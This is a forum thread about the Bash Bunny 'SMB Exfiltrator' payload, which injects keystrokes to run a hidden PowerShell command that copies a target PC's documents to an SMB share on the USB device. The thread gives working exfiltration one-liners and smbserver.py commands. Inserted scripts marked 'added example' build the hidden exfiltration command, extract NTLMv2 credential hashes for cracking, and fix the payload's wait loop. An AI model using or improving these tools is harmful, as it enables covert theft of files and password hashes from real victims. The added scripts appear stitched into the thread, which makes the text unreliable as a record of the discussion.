
[PAYLOAD] SMB Exfiltrator


Darren Kitchen


This payload exfiltrates specified documents to the Bash Bunny via SMB (Windows File Sharing).

https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/smb_exfiltrator

The first stage injects keystrokes into the Run dialog. The PowerShell one-liner waits until the Bash Bunny appears as a network, then copies files and exits. The PowerShell runs in a minimized state to limit visual impact on the target.

The second stage switches the attack mode from HID to RNDIS_ETHERNET and sets up an SMB server using Impacket. It then waits for files to finish copying from the target to a temp directory. Once exfiltration is complete, files are moved to a named and numbered loot directory on the USB disk partition.

A video walk-through can be found on Hak5 episode 2202:

https://www.youtube.com/watch?v=VPhqD__lOBQ

Version 1.0 of this payload uses conservative delay values and is not yet optimized for speed. A number of PowerShell aliases and shortcuts can be used to shorten the first stage, while the function which waits for files to finish copying can also be improved.

Hope you like it, guys! Cheers from Indonesia :) --Darren


Just tried this as my first payload and I was probably a bit over-ambitious, but what-the-heck!

Have I missed something? In the video everything proceeds quite covertly and there is even the option to delete the "run dialog" traces. However when I first tried SMB-Exfiltrator I got the big Windows "Select a Location for the Network... Home Network / Work Network / Public Network" dialog, which is a bit of a giveaway because it's so large.

Also the numbered output folder is created but despite the LEDs indicating that a transfer is in progress and then complete, no files are ever "delivered". And there ARE files to deliver, I put them in there. After that I tried other payloads that have outputs to storage and none ever wrote anything other than the output directory to the "loot" folder. I see on the forum that others seem to be experiencing this.

Still troubleshooting but thought I'd shout out in case anyone else has got any pointers.

(Testing on Win7x64 and using the latest bashbunny-payloads-master.zip)


On 3/22/2017 at 7:45 PM, Darren Kitchen said:

This payload exfiltrates specified documents to the Bash Bunny via SMB (Windows File Sharing).

Did you have an issue running `ATTACKMODE HID RNDIS_ETHERNET`?

I am trying to write a simple payload that requires both, but it seems Windows doesn't like that combo, although it shows as supported on the wiki. I may have to borrow your approach.


Have worked out that $ENV:UserProfile\Documents only works on computers using the standard C:\Users\username\Documents.

Attempting to use ([environment]::getfolderpath("mydocuments")) as this seems to work even if Documents is on a network drive or another hard drive.

Can't seem to get it to run:

QUACK STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy ([environment]::getfolderpath("mydocuments")) \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\""

I'm assuming my character escaping is incorrect, but I'm not exactly sure; using robocopy with this getfolderpath command works fine directly in PowerShell.

Any help, guys?


1 hour ago, Problex said:

Can't seem to get it to run.

Fixed the issue by swapping the double quotation marks

[environment]::getfolderpath("mydocuments")

for single quotation marks

[environment]::getfolderpath('mydocuments')

and it works!

I also saved some characters by changing the guest username for SMB to just g and renaming $EXFILTRATE_FILES to $EX in the PowerShell script and the bash at the top of the script.

QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e g /USER:g; robocopy ([environment]::getfolderpath('mydocuments')) \\\172.16.64.1\e $EF /S; exit } }\""

I guess I should have a go at putting this on GitHub...

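The fix above works because three parsers see that line in turn: bash parses the QUACK STRING argument, the Bunny types what bash produced, and PowerShell parses what was typed, so a double quote anywhere inside the body ends the command early. The following is an added example, not code from the hak5 payload or from Problex's fork, that builds the stage-1 one-liner from variables with only single-quoted PowerShell literals, refuses to emit a body that contains a double quote, and escapes exactly the four characters bash unescapes inside a double-quoted string. The Bunny address, the share name `e`, the user `g` and the `*.pdf` pattern are assumed values; the Test-Connection/net use/robocopy sequence is the one from the thread.

```shell
#!/bin/bash
# Added example, not from the hak5 payload or Problex's fork: build the stage-1
# PowerShell one-liner without the quoting bug from the thread. Assumed values:
# the Bunny's default RNDIS address, share "e", throwaway user "g", *.pdf.

# stage1_ps IP SHARE USER FILES -> PowerShell body, one line, no double quotes.
# The heredoc is unquoted so bash expands $ip etc.; \$true and \\ are escaped
# so they reach PowerShell intact. The .NET string literal uses single quotes
# so the body can be wrapped in double quotes later (the original "mydocuments"
# form ended the bash string early).
stage1_ps() {
    ip=$1; share=$2; user=$3; files=$4
    cat <<EOF
while (\$true) { If (Test-Connection $ip -count 1 -quiet) { sleep 2; net use \\\\$ip\\$share $user /USER:$user; robocopy ([environment]::getfolderpath('mydocuments')) \\\\$ip\\$share $files /S; exit } }
EOF
}

# body_is_quote_safe BODY -> 0 if BODY contains no double quote, else 1.
# Any double quote inside the body would terminate PowerShell's command string.
body_is_quote_safe() {
    case $1 in *\"*) return 1 ;; esac
    return 0
}

# stage1_cmd IP SHARE USER FILES -> the full command exactly as the target
# must receive it after the Bunny has typed it.
stage1_cmd() {
    body=$(stage1_ps "$@")
    body_is_quote_safe "$body" || { echo "refusing: double quote in body" >&2; return 1; }
    printf 'powershell -WindowStyle Hidden "%s"' "$body"
}

# quack_line IP SHARE USER FILES -> the line to paste into payload.txt.
# Bash unescapes \" \$ \\ and \` inside a double-quoted argument, so exactly
# those four characters are escaped here; everything else is typed verbatim.
quack_line() {
    cmd=$(stage1_cmd "$@") || return 1
    esc=$(printf '%s' "$cmd" | sed 's/[\\"$`]/\\&/g')
    printf 'QUACK STRING "%s"\n' "$esc"
}

# Print the payload.txt line when run directly.
if [ "${1:-}" = "--print" ]; then
    quack_line 172.16.64.1 e g '*.pdf'
fi
```

Run it with `--print` and paste the output into payload.txt; to check any hand-edited line, strip the leading `QUACK STRING ` and `eval` it through `printf '%s'`, which is exactly the unescaping bash will do when the payload runs, and compare the result with what you expect the target to see.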

18 hours ago, aethernaut said:

Also the numbered output folder is created but despite the LEDs indicating that a transfer is in progress and then complete, no files are ever "delivered".

I have the exact same problem: the output folder is created but nothing gets copied over.


1 hour ago, pman said:

I have the exact same problem: the output folder is created but nothing gets copied over.

Me too... lights are all in line with the readme, turns green when done, zero PDFs in the created loot folder even though there are PDFs in the Documents folder. Running on Win10.


You can use this helper to debug:

https://github.com/bg-wa/bashbunny-payloads/blob/bunny_debug_helpers/payloads/library/bunny_debug_helpers.sh

1.) Include the helper at the top of your script:

source bunny_debug_helpers.sh

2.) Pepper your script with log entries to see where events succeed.

debug_log "Attack Mode Set" #ln. 41
debug_log "IP Address : ${TARGET_IP}" #ln 92

3.) Plug in Bunny... bash bash bash...

4.) When finished, set the Bunny to arming mode and view your debug logs in the newly created "Debug" folder.


2 hours ago, bg-wa said:

You can use this helper to debug:

https://github.com/bg-wa/bashbunny-payloads/blob/bunny_debug_helpers/payloads/library/bunny_debug_helpers.sh

Did you submit a pull request for the debug helper? That's extremely handy and should be in the main repository at some point, I hope :)


On 24/03/2017 at 5:52 PM, Problex said:

I guess I should have a go at putting this on GitHub...

Pull request created: #134

Problex GitHub fork

Pretty sure this will fix the issues people are having with empty loot folders, as I was getting the same symptoms, e.g. green light and an empty folder with the PC name.


On 3/22/2017 at 8:45 PM, Darren Kitchen said:

This payload exfiltrates specified documents to the Bash Bunny via SMB (Windows File Sharing).

/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' e /root/loot/smb_exfiltrator/temp/ &

"That Place Where I Put That Thing That Time" - Love it. Lol. I don't care what anyone says. I still love that movie.


So I was reading through the payloads people have, and I've seen that when people use Impacket's smbserver.py they forget one thing that you can get for free along with the file upload. I will give you the changed command line below for the smbserver line.

/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' e /root/loot/smb_exfiltrator/temp/ >> /root/loot/smb_exfiltrator/smb.log &

Impacket's smbserver will grab NTLMv2 creds from Windows machines that connect through it and output them to stdout. All I am doing here is piping that to a log file in your payload's loot folder. :-)

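A companion to the log redirection in the post above, added here and not part of the hak5 payload: pull the NTLMv2 responses out of smb.log in the form hashcat (mode 5600) and john (netntlmv2) accept, drop exact repeats, and optionally ignore the payload's own throwaway account. The `g`/`guest` user from the payload's `net use` line logs on with a password you chose yourself, so its hash is noise; the hash worth keeping is the one Windows sends when it authenticates as the logged-on user. The example assumes smbserver.py logs each NTLMv2 logon as `[*] user::domain:challenge:ntproofstr:blob` and each connection as `[*] Incoming connection (ip,port)`; the log it parses is constructed and the hex values are made up.

```shell
#!/bin/bash
# Added example, not from the hak5 payload: harvest NTLMv2 responses from the
# smbserver.py log written by the redirection in the post above. Assumes the
# "[*] user::domain:challenge:ntproofstr:blob" line shape Impacket prints.

# write_sample_log PATH: a constructed smb.log (hex values are made up) with a
# real user logon, a repeat of the same logon, and the payload's own "g" account.
write_sample_log() {
    cat > "$1" <<'EOF'
[*] Config file parsed
[*] Incoming connection (172.16.64.2,49672)
[*] AUTHENTICATE_MESSAGE (DESKTOP-7Q2K1\alice,DESKTOP-7Q2K1)
[*] User DESKTOP-7Q2K1\alice authenticated successfully
[*] alice::DESKTOP-7Q2K1:1122334455667788:aabbccddeeff00112233445566778899:0101000000000000c0653150de09d2010a0b0c0d0e0f10110000000002000800570049004e0031000000000000000000
[*] Connecting Share(1:IPC$)
[*] Incoming connection (172.16.64.2,49680)
[*] AUTHENTICATE_MESSAGE (DESKTOP-7Q2K1\alice,DESKTOP-7Q2K1)
[*] User DESKTOP-7Q2K1\alice authenticated successfully
[*] alice::DESKTOP-7Q2K1:1122334455667788:aabbccddeeff00112233445566778899:0101000000000000c0653150de09d2010a0b0c0d0e0f10110000000002000800570049004e0031000000000000000000
[*] Incoming connection (172.16.64.2,49691)
[*] AUTHENTICATE_MESSAGE (\g,DESKTOP-7Q2K1)
[*] g::DESKTOP-7Q2K1:1122334455667788:99887766554433221100ffeeddccbbaa:0101000000000000c0653150de09d2012f2e2d2c2b2a29280000000002000800570049004e0031000000000000000000
[*] Connecting Share(2:e)
[*] Disconnecting Share(2:e)
EOF
}

# extract_ntlmv2 LOG [SKIP_USER] -> one hashcat-5600 line per distinct response.
# The regex pins the field widths of an NTLMv2 response (8-byte server
# challenge, 16-byte NTProofStr, variable-length blob) so chatter lines never
# match; SKIP_USER drops the payload's own throwaway account.
extract_ntlmv2() {
    log=$1; skip=${2:-}
    grep -E '^\[\*\] [^: ]+::[^:]*:[0-9a-fA-F]{16}:[0-9a-fA-F]{32}:[0-9a-fA-F]+$' "$log" \
        | sed 's/^\[\*\] //' \
        | awk -F'::' -v skip="$skip" '($1 != skip || skip == "") && !seen[$0]++'
}

# source_ips LOG -> distinct client addresses that connected to the share,
# handy for naming the loot directory when the hostname is not known.
source_ips() {
    sed -n 's/^\[\*\] Incoming connection (\([0-9.]*\),.*/\1/p' "$1" | sort -u
}

# Demo on the constructed log; writes hashes.5600 in the current directory.
if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp); write_sample_log "$tmp"
    extract_ntlmv2 "$tmp" g > hashes.5600
    echo "clients: $(source_ips "$tmp" | tr '\n' ' ')"
    echo "$(wc -l < hashes.5600) hash(es) written to hashes.5600"
    rm -f "$tmp"
fi
```

On a real run point `extract_ntlmv2` at the `smb.log` from the post above and feed the output to `hashcat -m 5600`; the dedupe is by exact line, so two logons that differ only in the server challenge are kept as two candidates, which is what you want.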


My apologies if this has already been covered, but I have not seen anything addressing this specific issue. Also, as a disclaimer, I am new to the Bash Bunny.

When I copy the payload for this to switch 2, safely eject the Bunny, move the switch to the switch 2 position, and then re-insert it, the Bunny LED turns green, then blinks white a few times, and then starts blinking blue and never stops.

I am using the Bunny on a Windows 10 machine. I can see some scripts quickly flashing up on the screen and then going away, but clearly the Bunny never finishes its task.

Any thoughts on what I'm missing? I made sure to load Impacket ahead of time.


On 13/06/2017 at 9:02 PM, twc said:

When I copy the payload for this to switch 2, safely eject the Bunny, move the switch to the switch 2 position, and then re-insert it, the Bunny LED turns green, then blinks white a few times, and then starts blinking blue and never stops.

Same.

Some interesting thoughts in this thread. Not sure how to fix it yet. It's getting stuck and never gets out of the following while loop. To fix it we have to find out why.

---------------

LED B 100
# Wait until files are done copying.
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done

---------------

Is this because the PS script has not run, or the SMB server is not running, or something else?

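The loop quoted above has no exit other than the marker file, so any stage-1 failure (the quoting bug earlier in the thread, PowerShell blocked by policy, the network-location prompt stealing focus) leaves the LED blinking blue forever and nothing in the loot folder to say which it was. Below is an added example, not code from the hak5 payload, of a bounded wait that also accepts "files have arrived and stopped growing" as completion and reports how it ended so the payload can log it. The `/loot/smb` path and marker name are the ones in the quoted loop; the 120-second budget, the log file name and the guarded payload.txt snippet at the end are assumptions.

```shell
#!/bin/bash
# Added example, not from the hak5 smb_exfiltrator payload: a bounded version of
#   while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
# Assumed: the stage-2 share is served from /loot/smb and stage 1 writes the
# EXFILTRATION_COMPLETE marker when robocopy finishes.

# wait_for_exfil DIR TIMEOUT_SECS [QUIET_POLLS] [INTERVAL]
#   0 - marker seen, or files present and total size unchanged for QUIET_POLLS
#       consecutive polls (robocopy finished but the marker never arrived)
#   1 - TIMEOUT_SECS elapsed and nothing was received (stage 1 never ran)
#   2 - TIMEOUT_SECS elapsed while files were still growing (slow copy)
wait_for_exfil() {
    dir=$1; timeout=$2; quiet_polls=${3:-5}; interval=${4:-1}
    start=$(date +%s); last=-1; stable=0; nfiles=0
    while [ $(( $(date +%s) - start )) -lt "$timeout" ]; do
        [ -f "$dir/EXFILTRATION_COMPLETE" ] && return 0
        # Total bytes and file count under DIR; both 0 while nothing has arrived.
        # Reading the files is fine for Bunny-sized loot; du -sb is cheaper on GNU.
        size=$(find "$dir" -type f -exec cat {} + 2>/dev/null | wc -c | tr -d ' ')
        nfiles=$(find "$dir" -type f 2>/dev/null | wc -l | tr -d ' ')
        if [ "$nfiles" -gt 0 ] && [ "$size" -eq "$last" ]; then
            stable=$((stable + 1))
            [ "$stable" -ge "$quiet_polls" ] && return 0
        else
            stable=0
        fi
        last=$size
        sleep "$interval"
    done
    [ "$nfiles" -gt 0 ] && return 2
    return 1
}

# exfil_status_text CODE -> one-line description for the payload's log.
exfil_status_text() {
    case $1 in
        0) echo "complete" ;;
        1) echo "timeout: no files received (stage 1 never connected?)" ;;
        2) echo "timeout: copy still in progress" ;;
        *) echo "unknown status $1" ;;
    esac
}

# How it slots into payload.txt. Guarded by --payload so the file can be
# sourced on a workstation without touching the LED or /loot.
if [ "${1:-}" = "--payload" ]; then
    LED B 100
    wait_for_exfil /loot/smb 120 5 1; rc=$?
    echo "$(date) exfil: $(exfil_status_text "$rc")" >> /loot/smb_exfiltrator.log
    if [ "$rc" -eq 0 ]; then LED G; else LED R; fi
fi
```

A return of 1 points at stage 1 (the one-liner never reached the share), a return of 2 at the copy budget; either way the payload ends with a coloured LED and a log line instead of blinking blue until the Bunny is pulled.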

I redid this payload to fit into the BBTPS. One issue I did run into is that some Windows 10 machines will always prompt for SMB creds. Working on that part because I want it to try to use the existing user creds and grab the hash at the same time, but it looks like I need to put in something to detect whether I need to use a default cred or not. I did see a post above talking about another set of unescaped double quotes which would break the string and script.



Hi Guys,

I am new here and trying to get a better SMB2 exfiltration. However, I run into slowness (about 30 s to 1 min) when PowerShell tries to connect to the Impacket smbserver. (I tried to work around this for a while.)

Could there be a more reliable and faster way to do this than with my code snippet here?

ATTACKMODE HID RNDIS_ETHERNET
...

...

RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"while(!(Test-Path \\\\$HOST_IP\\s)){net use \\\\$HOST_IP\\s /user:$USERNAME $PASSWORD}; ...
...
/tools/impacket/examples/smbserver.py -smb2support -comment '' s /loot/smb >> /loot/smbserver.log &
...

Thank you.
